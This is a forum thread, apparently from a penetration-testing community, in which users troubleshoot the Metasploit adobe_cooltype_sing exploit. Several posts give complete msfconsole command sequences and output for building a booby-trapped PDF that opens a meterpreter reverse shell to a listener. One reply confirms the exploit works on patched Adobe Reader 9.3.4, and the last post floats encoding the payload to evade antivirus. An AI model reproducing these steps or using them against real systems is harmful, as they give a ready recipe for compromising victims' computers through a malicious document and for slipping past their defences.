Page 1 of 2 12 LastLast
Results 1 to 10 of 18

Thread: adobe_cooltype_sing

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default adobe_cooltype_sing

    Hi all I have just seen this exploit write up and would like to know how to add it to metasploit to try out, in what directory would i place the file as a

    search adobe_cooltype_sing does not show up and i believe i will have to place it manually i have the rb file

    Also since I did the -apt-get upgrade for the new harvester update i cant seem to update msf but was able before using set...

    Thanks
    Last edited by pentest09; 09-10-2010 at 03:38 PM.

  2. #2
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: adobe_cooltype_sing

    For a write up on the adobe_cooltype_sing you can have a look at ;
    New Adobe 0day Demonstration | Attack Vector

    Further, regarding updating msf, open msfconsole and then msfupdate;
    Code:
    msfconsole
    msfupdate

    edit
    -----
    edited as moved from original location where posted/
    Last edited by TAPE; 09-10-2010 at 09:38 PM.

  3. #3
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: adobe_cooltype_sing

    thanks will try it just reverted backto snapshot before -upgrade and set updated it for fine so think it was the upgrade broke the app, and yeah found the write up on attack vector.

    thanks for quick reply

  4. #4

    Default Re: adobe_cooltype_sing

    Quote Originally Posted by TAPE View Post
    Not the place for questions, this is a place for explanations on how things are done..

    For a write up on the adobe_cooltype_sing you can have a look at ;
    New Adobe 0day Demonstration | Attack Vector

    Further, regarding updating msf, open msfconsole and then msfupdate;
    Code:
    msfconsole
    msfupdate

    ..after update
    Code:
    msfconsole
    use  exploit/windows/fileformat/adobe_cooltype_sing
    set OUTPUTPATH /tmp/test_adobe.pdf
    set LHOST x.x.x.x
    set PAYLOAD windows/meterpreter/reverse_tcp
    exploit
    use exploit/multi/handler
    set LHOST x.x.x.x
    set PAYLOAD windows/meterpreter/reverse_tcp
    set ExitOnSession false
    exploit -j
    Note: i start explicitly the sesssion handler, because it's not properly started with the fileformat
    exploit

    copy /tmp/test_adobe.pdf onto your windows box & execute....watch msf3 console ;-)
    especially be surprised if you use latest adobe 9.3.4!

    ...exploit it is not working on my XP3 with adobe 9.3.4 (enable/disable JS)box - adobe crashs...didn't
    have time yet to analyze...

    /brtw2003
    Last edited by brtw2003; 09-10-2010 at 04:57 PM.

  5. #5
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: adobe_cooltype_sing

    HI again jst run the exploit and it gives me an url instead of creating the pdf file heres the output whats wrong ?

    msf > use windows/browser/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set filename test.pdf
    filename => test.pdf
    msf exploit(adobe_cooltype_sing) > set outputpath /tmp
    outputpath => /tmp
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8
    LHOST => 192.168.0.8
    msf exploit(adobe_cooltype_sing) > exploit[*] Exploit running as background job.
    [*] Started reverse handler on 192.168.0.8:4444[*] Using URL: http://0.0.0.0:8080/wcTXIWj[*] Local IP: http://192.168.0.8:8080/wcTXIWj[*] Server started.
    msf exploit(adobe_cooltype_sing) >[*] Sending crafted PDF to 192.168.0.5:52492
    [-] Exception handling request: Connection reset by peer (thats me running it again in ie8)[*] Sending crafted PDF to 192.168.0.5:52498[*] Sending crafted PDF to 192.168.0.5:52500

    just hangs....

    please advise...

  6. #6
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: adobe_cooltype_sing

    pentest09 - I suggest you re-read brtw2003's post, particularly the step-by-step example he gave and the explicit note:

    Quote Originally Posted by brtw2003
    Note: i start explicitly the sesssion handler, because it's not properly started with the fileformat exploit
    Research a little bit, study the on-line guides for Metasploit and try a few things out. But brtw2003 has pretty much laid it out there for you.

    Btw - i just confirmed though my own testing that this particular exploit does in fact work on Windows XP SP3, Windows Vista and Windows 7, all with the latest Reader v9.3.4.
    Last edited by hypervista; 09-10-2010 at 07:39 PM. Reason: clarifying language

  7. #7
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default

    My fault rushing sorry so when the multi/handler is run it should create my pdf and set up the session correctly? I though that the first part would create the pdf even before the problem with the handling of the reverse connection.

    Will try thanks for your response..

    just tried it and got this:

    msf > use exploit/windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/test_adobe.pdf
    OUTPUTPATH => /tmp/test_adobe.pdf
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8
    LHOST => 192.168.0.8
    msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(adobe_cooltype_sing) > exploit
    [*] Started reverse handler on 192.168.0.8:4444[*] Creating 'msf.pdf' file...
    [-] Exploit exception: No such file or directory - /tmp/test_adobe.pdf/msf.pdf (so do i need a pdf in the first place to embed the explit code in to)[*] Exploit completed, but no session was created.
    msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
    msf exploit(handler) > set LHOST 192.168.0.8
    LHOST => 192.168.0.8
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set ExitOnSession false
    ExitOnSession => false
    msf exploit(handler) > exploit -j[*] Exploit running as background job.

    Its the file creation thats the problem
    Last edited by Archangel-Amael; 09-10-2010 at 09:40 PM.

  8. #8
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: adobe_cooltype_sing

    Why won't you pay attention ?

    You typed:
    Code:
    msf > use exploit/windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/test_adobe.pdf
    OUTPUTPATH => /tmp/test_adobe.pdf
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.8
    The outputpath is only where to put the .pdf if you want to give it a name change filename
    The correct command:
    Code:
    msf exploit(adobe_cooltype_sing) > set OUTPUTPATH /tmp/
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  9. #9
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: adobe_cooltype_sing

    Ok lads got it in the first write up it showed set output path i use set filename and it worked, thanks again ESET picked it up on win 7 anyway.

    cheers

  10. #10
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: adobe_cooltype_sing

    WIll have to have a look when I got a moment, but isnt there a way to output to raw data and encode before creating pdf ?

    That might help AV detection evasion.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •